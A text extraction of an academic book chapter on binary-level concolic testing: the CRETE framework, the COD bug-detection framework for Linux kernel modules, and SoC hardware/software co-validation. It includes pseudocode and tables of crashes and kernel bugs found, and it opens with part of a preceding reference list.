Kaivola R, Kohatsu K (2003) Proof engineering in the large: formal verification of Pentium® 4
floating-point divider. Int J Softw Tools Technol Transfer 4(3):323–334
Kaivola R, Narasimhan N (2001) Formal verification of the Pentium® 4 multiplier. In: Sixth IEEE
International High-Level Design Validation and Test Workshop, pp 115–120. https://doi.org/
10.1109/HLDVT.2001.972817
Kaufmann D, Biere A, Kauers M (2019) Verifying large multipliers by combining sat and computer
algebra. In: 2019 Formal Methods in Computer Aided Design (FMCAD). IEEE, pp 28–36
Kaufmann M, Manolios P, Moore JS (eds) (2000a) Computer-aided reasoning: ACL2 case studies.
Kluwer Academic Publishers, Boston
Kaufmann M, Manolios P, Moore JS (2000b) Computer-aided reasoning: an approach. Kluwer
Academic Publishers, Boston
Kaufmann M, Moore JS (1994) Design goals of ACL2. Technical Report 101, Computational
Logic Incorporated (CLI), Austin
Kaufmann M, Moore JS (1997) A precise description of the acl2 logic. See https://www.cs.utexas.
edu/users/moore/publications/km97a.pdf
Lahiri SK, Bryant RE, Cook B (2003) A symbolic approach to predicate abstraction. In: Hunt
WA Jr, Somenzi F (eds) Proceedings of the 15th International Conference on Computer-Aided
Verification. LNCS, vol 2275. Springer, pp 141–153
Leroy X (2006) Formal certification of a compiler back-end, or: programming a compiler with
a proof assistant. In: Proceedings of the 33rd Symposium on Principles of Programming
Languages (POPL 2006). ACM Press, pp 42–54
Levy HM (1984) Capability-based computer systems. Butterworth-Heinemann, Newton
Liu H, Moore JS (2004) Java program verification via a JVM deep embedding in ACL2. In:
International Conference on Theorem Proving in Higher Order Logics. Springer, pp 184–200
Manolios P (2000) Correctness of pipelined machines. In: Hunt WA Jr, Johnson SD (eds)
Proceedings of the 3rd International Conference on Formal Methods in Computer-Aided Design
(FMCAD 2000), LNCS, vol 1954. Springer, Austin, pp 161–178
Manolios P, Vroon D (2003) Algorithms for ordinal arithmetic. In: Baader F (ed) Proceedings
of the 19th International Conference on Automated Deduction (CADE 2003). LNAI, vol 2741.
Springer, Miami, pp 243–257
Moore JS (1996) Piton: a mechanically verified assembly-level language. Automated reasoning
series, Kluwer Academic Publishers, USA
Moore JS (2003) Proving theorems about Java and the JVM with ACL2. In: Broy M, Pizka M
(eds) Models, algebras, and logic of engineering software. IOS Press, pp 227–290
Moore JS, Lynch T, Kaufmann M (1998) A mechanically checked proof of the kernel of the
AMD5K86 floating-point division algorithm. IEEE Trans Comput 47(9):913–926
Moore JS, Porter G (2002) The apprentice challenge. ACM Trans Program Lang Syst (ACM
TOPLAS) 24(3):1–24
Mukherjee R, Joshi S, Griesmayer A, Kroening D, Melham T (2016) Equivalence checking of
a floating-point unit against a high-level c model. In: Fitzgerald J, Heitmeyer C, Gnesi S,
Philippou A (eds) FM 2016: Formal Methods. Springer International Publishing, Cham, pp 551–
558
Mukherjee R, Kroening D, Melham T, Srivas M (2015) Equivalence checking using trace
partitioning. In: 2015 IEEE Computer Society Annual Symposium on VLSI, pp 13–18. https://
doi.org/10.1109/ISVLSI.2015.110
Myreen MO, Gordon M, Slind K (2008) Machine-code verification for multiple architectures –
An application of decompilation into logic. In: Formal methods in computer-aided design,
2008. FMCAD’08, pp 1–8. https://doi.org/10.1109/FMCAD.2008.ECP.24, http://www.cl.cam.
ac.uk/~mom22/decomp.pdf
Nipkow T, Paulson LC, Wenzel M (2002) Isabelle/HOL: a proof assistant for higher-order logic,
vol 2283. Springer Science & Business Media, Lecture Notes in Computer Science, Springer
Berlin. https://doi.org/10.1007/3-540-45949-9
O’Leary J, Kaivola R, Melham T (2013) Relational ste and theorem proving for formal verification
of industrial circuit designs. In: 2013 Formal Methods in Computer-Aided Design. IEEE,
pp 97–104
Owre S, Rushby JM, Shankar N (1992) PVS: a prototype verification system. In: Kapur D (ed)
11th International Conference on Automated Deduction (CADE). Lecture notes in artificial
intelligence, vol 607. Springer, Saratoga, pp 748–752
Patil H, Cohn R, Charney M, Kapoor R, Sun A, Karunanidhi A (2004) Pinpointing representative
portions of large Intel® Itanium® programs with dynamic instrumentation. In: 37th International
Symposium on Microarchitecture (MICRO-37’04), pp 81–92. https://doi.org/10.1109/MICRO.
2004.28
Paulson L (1993) Set theory for verification: I. From foundations to functions. J Autom Reason
11:353–389
Paulson L (1995) Set theory for verification: II. Induction and recursion. J Autom Reason
15:167–215
Pouarz TW, Agrawal V (2016) Efficient and exhaustive floating point verification using sequential
equivalence checking. DVCon
Pratt VR (1995) Anatomy of the pentium bug. In: Proceedings of the 6th International Joint
Conference CAAP/FASE on Theory and Practice of Software Development, TAPSOFT’95.
Springer, Berlin/Heidelberg, pp 97–107
Ray S, Bhadra J (2007) A mechanized refinement framework for analysis of custom memories.
In: Baumgartner J, Sheeran M (eds) Proceedings of the 7th International Conference on
Formal Methods in Computer-Aided Design (FMCAD 2007). IEEE Computer Society, Austin,
pp 239–242
Ray S, Bhadra J, Portlock T, Syzdek R (2010) Modeling and verification of industrial flash
memories. In: International Symposium on Quality Electronic Design
Ray S, Hunt WA Jr, Matthews J, Moore JS (2008) A mechanical analysis of program verification
strategies. J Autom Reason 40(4):245–269
Ray S, Moore JS (2004) Proof styles in operational semantics. In: Hu AJ, Martin AK (eds)
Proceedings of the 5th International Conference on Formal Methods in Computer-Aided Design
(FMCAD 2004). LNCS, vol 3312. Springer, Austin, pp 67–81
Ray S, Sumners R (2007) Combining theorem proving with model checking through predicate
abstraction. IEEE Des Test Comput 24(2):132–139
Ray S, Sumners R (2013) Specification and verification of concurrent programs through refine-
ments. J Autom Reason 51(3):241–280
Reid A (2016) Trustworthy specifications of ARM v8-A and v8-M system level architecture.
In: Proceedings of the 16th Conference on Formal Methods in Computer-Aided Design
(FMCAD’16)
Reid A, Chen R, Deligiannis A, Gilday D, Hoyes D, Keen W, Pathirane A, Shepherd O, Vrabel
P, Zaidi A (2016) End-to-end verification of processors with ISA-formal. In: International
Conference on Computer Aided Verification. Springer, pp 42–58
Russinoff D (1992) A mechanical proof of quadratic reciprocity. J Autom Reason 8:3–21
Russinoff D (1994) A mechanically verified incremental garbage collector. Form Asp Comput
6:359–390
Russinoff D (1998) A mechanically checked proof of IEEE compliance of a register-transfer-
level specification of the AMD-K7 floating-point multiplication, division, and square root
instructions. LMS J Comput Math 1:148–200
Russinoff DM (2000) A case study in formal verification of register-transfer logic with acl2: The
floating point adder of the amd athlon tm processor. In: International Conference on Formal
Methods in Computer-Aided Design. Springer, pp 22–55
Russinoff DM (2018) Formal verification of floating-point hardware design: a mathematical
approach. Springer, Springer International Publishing, ISBN: 9783319955131
Saidi H, Shankar N (1999) Abstract and model check while you prove. In: Halbwacha N, Peled D
(eds) Proceedings of the 11th International Conference on Computer-Aided Verification (CAV
1999), LNCS, vol 1633. Springer, pp 443–453
Contents
Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1366
Challenges of Classic Symbolic and Concolic Testing . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1367
Overview of Versatile Binary-Level Concolic Testing . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1367
Background . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1368
Symbolic Execution . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1368
Concolic Testing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1369
Related Works . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1370
The Infrastructure of Versatile Binary-Level Concolic Testing . . . . . . . . . . . . . . . . . . . . . . . 1371
Design and Architecture . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1372
Real-World Examples . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1373
Concolic Testing on COTS Linux Kernel Modules . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1375
Design and Architecture . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1376
Real-World Examples . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1378
Concolic Testing for Hardware/Software Co-validation of Systems-on-Chips . . . . . . . . . . . 1380
Design and Architecture . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1380
Real-World Examples . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1383
Conclusions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1385
References . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1385
B. Chen ()
Intel Corporation, Hillsboro, OR, USA
e-mail: [email protected]
F. Xie
Department of Computer Science, Portland State University, Portland, OR, USA
e-mail: [email protected]
Abstract
of unsafe, insecure, and unreliable computing systems. These all point to the
great need for sophisticated system validation techniques. This chapter presents
versatile binary-level concolic testing, which defines a standard execution-
trace format, and features an open and highly extensible architecture. It allows
easy integration of multiple concrete execution frontends and symbolic exe-
cution backends, which significantly improves the applicability and flexibility
of symbolic execution, especially to modern computing systems with various
components, e.g., operating systems, firmware, and hardware devices. First, this
chapter presents the design and implementation of CRETE, the infrastructure
of versatile binary-level concolic testing. Second, this chapter presents COD, a
framework based on versatile binary-level concolic testing for automated bug
detection and replay of commercial off-the-shelf (COTS) Linux kernel modules
(LKMs). This framework automatically generates compact sets of test cases
for COTS LKMs, proactively checks for common kernel bugs, and allows
reported bugs to be reproduced repeatedly with actionable test cases. Last, this chapter
presents how versatile binary-level concolic testing is leveraged for system-level
validation of Systems-on-Chips (SoC). The authors capture runtime traces of
hardware/software (HW/SW) components across the entire SoC stack which are
emulated by multiple virtual platforms. Based on segmented traces captured from
various SoC components, the authors assemble system-level traces and provide
interfaces for users to inject system-level assertions for validation.
Keywords
Introduction
There have been many recent approaches to symbolic execution (Avgerinos et al.
2014a,b; Shoshitaishvili et al. 2016; Stephens et al. 2016; Redini et al. 2017;
Palikareva et al. 2016; Palikareva and Cadar 2013; Bucur et al. 2014; Kasikci et al.
2015; Ramos and Engler 2015; Zheng et al. 2017; Li et al. 2021; Stoenescu et al.
2016). Generally speaking, these approaches can be classified into two categories:
online symbolic execution (e.g., BitBlaze (Song et al. 2008), KLEE (Cadar et al.
2008), and S2E (Chipounov et al. 2012)) and concolic execution (a.k.a. offline
symbolic execution, e.g., CUTE (Sen et al. 2005), DART (Godefroid et al. 2005),
and SAGE (Godefroid et al. 2012)). Online symbolic execution closely couples
Symbolic Execution Engines (SEE) with the System Under Test (SUT) and explores
all possible execution paths of the SUT online at once. On the other hand, concolic
execution decouples the SEE from the SUT through traces: it concretely runs a
single execution path of the SUT and then symbolically executes that path. Both online
and offline symbolic execution are facing two major challenges for analyzing
modern software systems: (1) the SUT involves many types of software for different
hardware platforms, and (2) the SUT involves many components distributed on
different machines, and as a whole the SUT cannot fit in any SEE.
What’s more, modern computing systems consist of many software components
from various vendors, and access to all corresponding source code is rarely feasible.
Even when source code is available, building the code exactly as in the shipped
software product is difficult (Bessey et al. 2010). Moreover, even when the source
code is available, compilers can transform it in many unpredictable ways, for
example, when handling undefined behaviors in C (Chipounov 2014). Thus, analyses
of the software stack of computing systems ought to be done at the binary level, in
order to be practical and useful.
Analysis at binary level loses high-level semantics information from the source
code that is critical for efficient symbolic analysis. It adds extra complications
on top of the two open questions of symbolic execution, namely, state explosion
and expensive constraint solving. As a result, optimizations are required to deliver
practical techniques that use symbolic execution.
Background
This section presents the background of classic symbolic execution and concolic
testing.
Symbolic Execution
Symbolic execution (Baldoni et al. 2018) is a program analysis technique that takes
symbolic inputs, maintains different execution states and constraints of each path in
a program, and utilizes scheduling heuristics (Cha et al. 2018) to effectively explore
the execution tree of the target program. An execution state from the symbolic
execution of a program includes a statement counter, values of variables, and a path
condition. Since the inputs are symbolic, the values of variables are expressions
Fig. 2 A simple function bad_abs in C with its symbolic execution tree: (a) Function bad_abs
in C. (b) Symbolic execution tree of bad_abs with symbolic value α assigned to input variable x
over symbolic inputs, and the path condition is a Boolean expression over symbolic
inputs. Figure 2 illustrates an example of symbolic execution. At the entry of
function bad_abs, input x is assigned with symbolic value α, which allows all
valid values of integer type. For each conditional branch related to symbolic inputs,
if both paths are feasible, a new execution state will be forked from the current
execution state. By updating the path condition based on the branch condition, both
paths of the conditional branch can be covered and explored. For this example,
symbolic execution forks states twice for two conditional branches, covering three
paths in the function.
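The body of bad_abs is not reproduced in the text; the following C function is a
hedged reconstruction of the kind of code Fig. 2 depicts, mirroring only its branching
structure (two input-dependent branches yielding three paths; the constant 1234 is
illustrative).

/* Symbolic execution with x = α forks at each of the two conditional
   branches below, covering three paths in total, as described in the
   text accompanying Fig. 2. */
int bad_abs(int x) {
    if (x < 0)
        return -x;    /* path 1: negative input */
    if (x == 1234)
        return -x;    /* path 2: a buggy special case */
    return x;         /* path 3: ordinary nonnegative input */
}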
Concolic Testing
Concolic execution (Sen et al. 2005; Kannavara et al. 2015) combines concrete
and symbolic execution. It leverages a concrete execution path to guide symbolic
execution to achieve better scalability (Cadar and Sen 2013). It has advantages over
concrete execution since it explores each execution path only once based on path
constraints, while it is more scalable than symbolic execution because it leverages
information from concrete execution to augment symbolic execution. Figure 3
illustrates the basic workflow of concolic testing.
Given an initial test case, the software program under test is concretely executed.
During the concrete execution, a trace of the concrete execution is captured, which
mainly contains path constraints of the exercised path. By using an offline constraint
solver, each branch condition from the captured trace is negated to generate a new
test case, aiming at covering new paths of the program under test. Newly generated
test cases are fed back into the concrete execution. This process repeats until all
paths of the program have been explored or a user-specified condition is satisfied.
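In pseudocode-like C, the loop just described might look as follows. All helper
names here are our own illustration of the generic concolic workflow, not the API of
any particular tool.

#include <stdbool.h>
#include <stddef.h>

typedef struct { unsigned char data[256]; size_t len; } test_case;
typedef struct trace trace;    /* opaque: path constraints of one run */

extern trace     *run_concrete(const test_case *tc); /* execute + trace    */
extern size_t     num_branches(const trace *t);
extern bool       solve_negated(const trace *t, size_t i, test_case *out);
extern bool       pool_add(const test_case *tc);     /* false if duplicate */
extern test_case *pool_next(void);                   /* NULL when empty    */

void concolic_loop(const test_case *seed) {
    pool_add(seed);
    for (test_case *tc; (tc = pool_next()) != NULL; ) {
        trace *t = run_concrete(tc);   /* concrete run, captured trace */
        for (size_t i = 0; i < num_branches(t); i++) {
            test_case fresh;
            /* negate the i-th branch condition of the captured path
               and ask the solver for an input that takes the other
               side of that branch */
            if (solve_negated(t, i, &fresh))
                pool_add(&fresh);
        }
    }
}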
Related Works
DART (Godefroid et al. 2005) and CUTE (Sen et al. 2005) are both early
representative works on concolic testing. They operate on the source code level.
CRETE further extends concolic testing and targets close-source binary programs,
while it also modularizes concolic testing by loosely coupling concrete execution
and symbolic execution only by standardized trace files based on the LLVM bitcode
and test cases. SAGE (Godefroid et al. 2012) is a Microsoft internal concolic testing
tool that particularly targets x86 binaries on Windows.
KLEE (Cadar et al. 2008) is a source-code-level symbolic execution tool that
is built on the LLVM infrastructure (Lattner and Adve 2004) and is capable of
generating high-coverage test cases for C programs. KLEE analyzes the LLVM
bitcode compiled from the C SUT, symbolically explores the execution paths of
the program, and generates a test case for each path explored. S2E (Chipounov
et al. 2012) provides a framework for developing tools for analyzing close-source
software programs. It augments a virtual machine (VM) with a SEE and path
analyzers. It features a tight coupling of concrete and symbolic execution. The
execution of a SUT can cross back and forth between concrete and symbolic
execution.
BitBlaze (Song et al. 2008) is an early representative work on binary analysis
for computer security. It provides TEMU, a QEMU-based runtime analysis frontend,
and VINE, a symbolic execution backend. TEMU and VINE were closely inte-
grated into Rudder, a tool for symbolic execution of software binaries. BitBlaze,
particularly Rudder, focuses on effective detection of security vulnerabilities by
leveraging the close coupling of TEMU and VINE. Mayhem (Cha et al. 2012) and
MergePoint (Avgerinos et al. 2014a) build on BitBlaze and further optimize the
close coupling of their concrete execution frontend and symbolic analysis backend
to improve their effectiveness in detecting exploitable software bugs.
ANGR is an extensible Python framework for binary analysis using VEX (Nether-
cote and Seward 2007) as an intermediate representation (IR). It implemented a
number of existing analysis techniques and enabled the comparison of different
techniques in a single platform. ANGR provides CLE to load the binary under test in
its own virtual environment and provides lifters to disassemble binary code into
VEX IR, from where it conducts symbolic execution over VEX IRs. As ANGR
performs in vitro binary analysis, it must model the real execution environment
for the binary under test, such as system calls and common library functions. This is
one of the biggest limitations of ANGR, because the environment model can never be
complete or accurate.
Much research close to CRETE has been done in the area of HW/SW co-validation.
HW/SW co-verification is a common technique which mainly
uses model checking to verify HW/SW interface protocols against the driver and
various device models (Kurshan et al. 2002; Mukherjee et al. 2017; Corteggiani
et al. 2021; Jakobs et al. 2021; Lyu and Mishra 2021). Recent research work
leverages virtual devices for HW/SW co-validation and SoC validation (Gu et al.
2018; Lei et al. 2019). Symbolic execution with VD co-verification is proposed to
verify hardware and firmware interactions (Horn et al. 2013; Alam et al. 2022). These
works focus on either device/driver interfaces or device/firmware interfaces and
lack a holistic system-level analysis of the entire SoC stack.
The Infrastructure of Versatile Binary-Level Concolic Testing
The CRETE framework for binary-level concolic testing features several key design
goals:
• Binary-Level In Vivo Analysis. It requires only the binary of the SUT and
performs analysis in its real execution environment.
• Extensibility. It allows easy integration of concrete execution frontends and SEE
backends.
• High Coverage. It achieves coverage that is not significantly lower than the
coverage attainable by source-level analysis.
• Minimal Changes to Existing Testing Processes. It should simply provide
additional test cases that can be plugged into existing testing processes without
major changes to the testing processes.
This online tracing and offline test generation process is iterative: it repeats until all
generated test cases are issued or time bounds are reached. The CRETE framework
extends this process to satisfy its design goals as follows.
tracing facility, or a dynamic binary instrumentation tool, such as PIN (Luk et al.
2005) and DynamoRIO (Bruening et al. 2012).
• The concrete and symbolic execution environments are decoupled by standard-
ized traces. As long as they can generate and consume standardized traces, they
can work together as a cohesive concolic process.
• Optimization can be explored on both tracing and test case generation, for
example, selective binary-level tracing to improve scalability and concolic
test generation to reduce test case redundancy. This makes high-coverage test
generation on binary level possible.
• The tracing plugin is transparent to existing testing processes, as it only collects
information. Therefore, no change is made to the testing processes.
As shown in Fig. 4, CRETE has four key components: CRETE Runner, a tiny
helper program executing in the guest OS of the VM, which parses the configuration
file and launches the target binary program (TBP) with the configuration and test
cases; CRETE Tracer, a comprehensive tracing plugin in the VM, which captures
binary-level traces from the concrete execution of the TBP in the VM; CRETE
Replayer, an extension of the SEE, which enables the SEE to perform concolic
execution on the captured traces and to generate test cases; CRETE Manager, a
coordinator that integrates the VM and SEE, which manages runtime traces captured
and test cases generated, coordinates the concrete and symbolic execution in the VM
and the SEE, and iteratively explores the TBP.
CRETE takes a TBP and a configuration file as inputs, and outputs generated test
cases along with a report of detected bugs. The manual effort and learning curve to
utilize CRETE are minimal. Setting up the testing environment for the TBP in a
CRETE-instrumented VM is virtually no different from doing so in a vanilla VM.
The configuration file is an interface for users to configure parameters for testing a
TBP, especially specifying the number and size of symbolic command-line inputs
and symbolic files for test case generation.
Fig. 4 The architecture of CRETE: CRETE Runner executes the target binary in the guest OS of
the virtual machine; captured traces flow through the trace pool to the symbolic execution engine,
and generated test cases flow back, with CRETE Manager coordinating the exchange
The workflow of CRETE is shown in Fig. 5. CRETE works in iterations and each
iteration includes the following phases:
• Binary Execution Phase: CRETE Runner first loads the input binary and a test
case into the guest OS. Then CRETE Runner executes the binary with the data
defined in the test case as inputs. In this way, the binary is executed within the VM in
its native, unmodified guest OS environment.
• Trace Capture Phase: Along with the execution of the target program, CRETE
Tracer captures the runtime information needed to constitute a runtime trace for
symbolic analysis.
• Trace Selection Phase: CRETE Manager takes the captured trace as input and
maintains a pool of traces. CRETE Manager then selects a trace from this pool
and passes it to CRETE Replayer.
• Offline Replaying Phase: CRETE Replayer, in turn, invokes the SEE to execute
the selected trace symbolically. The SEE performs concolic test case generation.
• Test Selection Phase: CRETE Manager receives newly generated test cases from
the SEE and maintains a test case pool. CRETE Manager then selects one test
case from the pool and sends it back to CRETE Runner to start the next iteration
of CRETE. This workflow iterates until no more test cases can be generated or
user-specified time bounds are reached.
Real-World Examples
Table 1 Comparison of average and median coverage by KLEE, ANGR, and CRETE on COREUTILS
Table 2 Distribution comparison of coverage achieved by KLEE, ANGR, and CRETE on COREUTILS
Table 3 Classified crashes found by CRETE on TianoCore utilities: 84 unique crashes from eight
programs

Crash type               Count   Severity                        Crashed programs
Stack corruption         1       High (exploitable)              VfrCompile
Heap error               6       High (exploitable)              GenFw
Write access violation   23      High (exploitable)              EfiLdrImage, GenFw, EfiRom, GenFfs
Abort signal             2       Medium (signs of exploitable)   GenFw
Read access violation    45      Low (may not be exploitable)    GenSec, GenFw, Split, GenCrc32, VfrCompile
Other access violation   7       Mixed                           GenFw
CRETE delivered high code coverage from scratch, above 80% line coverage, on 9 out of
16 programs. What’s more, CRETE found 84 distinct crashes (by stack hash) from
eight TianoCore utility programs. Table 3 shows that CRETE found various kinds
of crashes including many exploitable ones, such as stack corruption, heap error,
and write access violation. Most of the crashes were confirmed as real bugs, and ten
of them were fixed promptly upstream.
Concolic Testing on COTS Linux Kernel Modules
This section presents COD, a framework for efficient bug detection and replay
of commercial off-the-shelf (COTS) Linux kernel modules based on versatile
binary-level concolic testing. The framework automatically generates compact sets
of test cases for COTS LKMs, proactively checks for common kernel bugs, and
allows reported bugs to be reproduced repeatedly with actionable test cases.
The COD framework features the following design goals for analyzing LKMs:
Design and Architecture
To achieve the goals above, the versatile binary-level concolic testing approach of
CRETE is adopted and extended in the design of the COD framework as follows.
As shown in Fig. 7, the COD architecture for test case generation is split into
two domains, VM guest OS and host OS. A user-land Agent and two custom ker-
nel modules, kernel shim and kernel hypercall interface, together
with target LKMs and native OS stack are running within VM guest OS. A virtual
machine augmented with COD Tracer, a symbolic engine augmented with COD
Trace Replayer, and a Manager are running on host machine.
Here are the events and communications that take place during the test case
generation process of the COD framework. When the manager is started, (1) it
sends a message to Agent through sockets and (2) sends an initial test case to the
VM. The message contains a list of target LKMs and a sequence of commands as
test harness. (3) The Agent loads two custom kernel modules, kernel shim
and kernel hypercall interface, and passes them the list of LKMs
as parameters. (4) The Agent then executes the commands of the test harness
sequentially to trigger functionalities of target LKMs through base kernel. (5)
The custom kernel module kernel shim intercepts the interactions between
base kernel and target LKMs. (6) It also communicates with the VM through the
other module kernel hypercall interface, to add new tainted values
to the taint analysis engine in the VM, report kernel panics to the VM, and
retrieve values of test case from VM to modify the interactions between target
LKMs and base kernel if needed. (7) When all commands in the test harness
are finished, the COD Tracer captures the runtime execution trace into a file
and sends it to symbolic engine through the manager over sockets. (8) The COD
Trace Replayer performs symbolic analysis over the captured trace and sends
the generated test cases back to the VM. The iteration of test case generation repeats
from step (4) to step (8) and stops when user-specified conditions are met, e.g., time
limits.
COD allows users to replay generated test cases repeatedly on both physical
and virtual machines and generates crash logs to assist developers in debugging and
fixing reported bugs. As shown in Fig. 8, the architecture of test case replay in COD
is composed of a user-mode program TC Replayer with an extensible plugin
kAPI Checker and three custom kernel modules, namely, Kernel Shim,
TC Element Supplier, and kAPI Tracer. The workflow of this design
Real-World Examples
Table 5 New Linux kernel vulnerabilities detected by COD

Index   LKM           Bug description            Patch hash
1       E1000         Resource leak              ee400a3
2       E1000         Null-pointer dereference   cf1acec
3       Pcnet32       Resource leak              d7db318
4       8139too(cp)   Kernel API misuse          a456757
5       hda_intel     Null-pointer dereference   a3aa60d
COD reported a total of five new distinct vulnerabilities from four different kernel modules.
As shown in Table 5, COD detected various kinds of vulnerabilities, including
null-pointer dereference, resource leak, and kernel API misuse. All the bugs were
reported to the Linux kernel community and were patched immediately. The links
of the submitted bugs are omitted for double-blind review purposes.
The authors take Bug 1 as an example to explain why COD is able to generate
test cases from COTS LKMs to trigger and report the new flaws in Table 5. Bug
1 is detected by TC Replayer during the replay of COD generated test cases,
where kAPI checker reported a piece of memory allocated by function
__kmalloc is not paired with any memory de-allocation function. By examining
test cases triggering this bug, the authors found COD only flipped a single kernel
API return from the initial test case. COD was able to explicitly flip these single
API returns because there are conditional branches in the target LKM depending on
the flipped API returns. By leveraging concolic execution, COD was able to negate
these branch conditions precisely, generate a compact set of test cases to explore
new code in the LKM, and finally catch the bug with TC Replayer and kAPI
checker. For a similar reason, COD flipped more kernel API returns, generated LKM
test cases with the right kernel API combination to reach error paths, and finally
reported these vulnerabilities with TC Replayer.
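The alloc/free pairing check attributed to kAPI Checker above can be sketched as
follows. This is a simplified illustration with hypothetical hook names, not COD's
actual implementation.

#include <stdio.h>

#define MAX_ALLOCS 1024

static void *live[MAX_ALLOCS];   /* allocations seen but not yet freed */
static int   nlive;

/* invoked when the replayed LKM calls __kmalloc */
void on_kmalloc(void *p) {
    if (p && nlive < MAX_ALLOCS)
        live[nlive++] = p;
}

/* invoked when the replayed LKM calls a memory de-allocation function */
void on_kfree(void *p) {
    for (int i = 0; i < nlive; i++)
        if (live[i] == p) { live[i] = live[--nlive]; return; }
}

/* invoked when test-case replay finishes: anything still live is an
   unpaired allocation, i.e., a resource leak like Bug 1 */
void report_leaks(void) {
    for (int i = 0; i < nlive; i++)
        fprintf(stderr, "resource leak: %p never freed\n", live[i]);
}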
Concolic Testing for Hardware/Software Co-validation of Systems-on-Chips
Design and Architecture
As shown in Fig. 9, the framework mainly has two phases, online tracing and offline
analysis. At runtime (online), it performs end-to-end tracing over the entire SoC
stack emulated by multiple virtual platforms (VP), from which a sequence of traces
is captured, including host SW traces, virtual device (VD) traces, and firmware
traces. Statically (offline), the framework assembles segmented traces into a holistic
system-level trace, provides instrumentation interfaces for user-defined assertions
and symbolic values over the assembled trace, and utilizes concolic/symbolic
engines to generate test cases that either explore new usages of the SoC or trigger
user-defined assertions.
A set of tracers is provided, one for each SoC hardware component, for runtime
tracing, as shown in Fig. 9. The tracer for host SW is an extension to the SoC host
VP. When a target application is invoked, the tracer captures user inputs as r^h and
takes a snapshot of the VP’s CPU and memory as s^h. It also monitors the complete
execution of host SW to capture a sequence of machine-level instructions as the
execution path of host SW, π^h. The VD tracer is a wrapper to the IP VD, which
intercepts all interactions between the IP VD and the SoC host VP. For each host
SW/VD interaction, the tracer captures the VD requests as r^v and takes the snapshot
of the VD state as s^v. The path π^v is a concrete execution path of the VD and can be
derived from the VD source code with the captured r^v. The tracer for firmware is an
extension to the IP Core VP. For each request from VD, it captures the request input
as r^f, takes a snapshot of the VP’s CPU and memory before the execution of the
firmware as s^f, and monitors the complete execution of the firmware to capture
a sequence of machine-level instructions as the execution path of firmware, π^f.
A unified instruction format is needed to make traces captured by different tracers
compatible.
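One plausible shape for such a unified format is sketched below. The field names are
our own illustration, not the framework's actual trace schema; the Nop markers
mirror those consumed by Algorithm 1 below.

#include <stdint.h>

/* A hypothetical unified trace record: every tracer (host SW, VD,
   firmware) emits entries of this one shape, plus synthetic Nop
   markers at cross-component boundaries, so that segmented traces
   can be assembled into a single system-level trace. */
typedef enum {
    INSN_HOST_SW, INSN_VD, INSN_FW,    /* ordinary instructions       */
    NOP_ENTER_VD, NOP_LEAVE_VD,        /* host SW <-> VD boundary     */
    NOP_ENTER_FW, NOP_LEAVE_FW         /* VD <-> firmware boundary    */
} insn_kind;

typedef struct {
    insn_kind kind;       /* originating tracer, or a boundary marker */
    uint64_t  pc;         /* guest program counter                    */
    uint8_t   len;        /* number of valid instruction bytes        */
    uint8_t   bytes[15];  /* raw machine instruction encoding         */
} unified_insn;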
Fig. 9 Architecture and workflow of end-to-end concolic testing for hardware/software co-
validation: (1) execute SoC software stack over different VPs with partitioned VDs; (2) capture
segmented traces from UOD, VD, and firmware, respectively; (3) assemble a system-level trace and
inject system-level assertions; and (4) inject symbolic values at HW/SW interfaces and perform
concolic-symbolic hybrid execution, generating test cases to cover new usage of the SoC or trigger
assertions
Algorithm 1: ASSEMBLE-SYS-TRACE(τ^h, T^v, T^f)
1:  (r^h, s^h, π^h) ← τ^h
2:  S^v ← map(STATE, T^v); S^f ← map(STATE, T^f)
3:  π ← []  ▹ initialize π to be an empty sequence
4:  foreach i^h ∈ π^h do
5:    if i^h is a normal instruction then APPEND(π, i^h)
6:    else  ▹ i^h interacts with the virtual device
7:      APPEND(π, NopEnterVd)
8:      (r^v, s^v, π^v) ← NEXT(T^v)
9:      foreach i^v ∈ π^v do
10:       if i^v is a normal instruction then APPEND(π, i^v)
11:       else  ▹ i^v interacts with the firmware
12:         APPEND(π, NopEnterFw)
13:         (r^f, s^f, π^f) ← NEXT(T^f)
14:         foreach i^f ∈ π^f do
15:           APPEND(π, i^f)
16:         APPEND(π, NopLeaveFw)
17:     APPEND(π, NopLeaveVd)
18: return (r^h, s^h, S^v, S^f, π)
Algorithm 2: INTERPRET-SYS-TRACE(τ^S, callbacks)
1: (r^h, s^h, S^v, S^f, π^S) ← τ^S
2: foreach i ∈ π^S do
3:   switch i do
4:     case NopEnterVd: s^v ← NEXT(S^v)
5:     case NopEnterFw: s^f ← NEXT(S^f)
6:     otherwise: EXECUTE(s^h, s^v, s^f, i)
7:   if i is a Nop then
8:     PROCESS-CALLBACKS(r^h, s^h, s^v, s^f, callbacks)
analysis of the SoC trace, which is similar to various consistency models described
in S2E (Chipounov et al. 2012).
Real-World Examples
Table 7 Number of generated test cases and triggered assertions from concolic-symbolic hybrid
execution

                       User-inputs to stimulus   Driver/VD interface   VD/firmware interface
Generated test cases   20                        1001                  49
Validated assertions   5                         1                     4
Fired assertions       1                         7                     2
Detected bugs          1                         3                     1
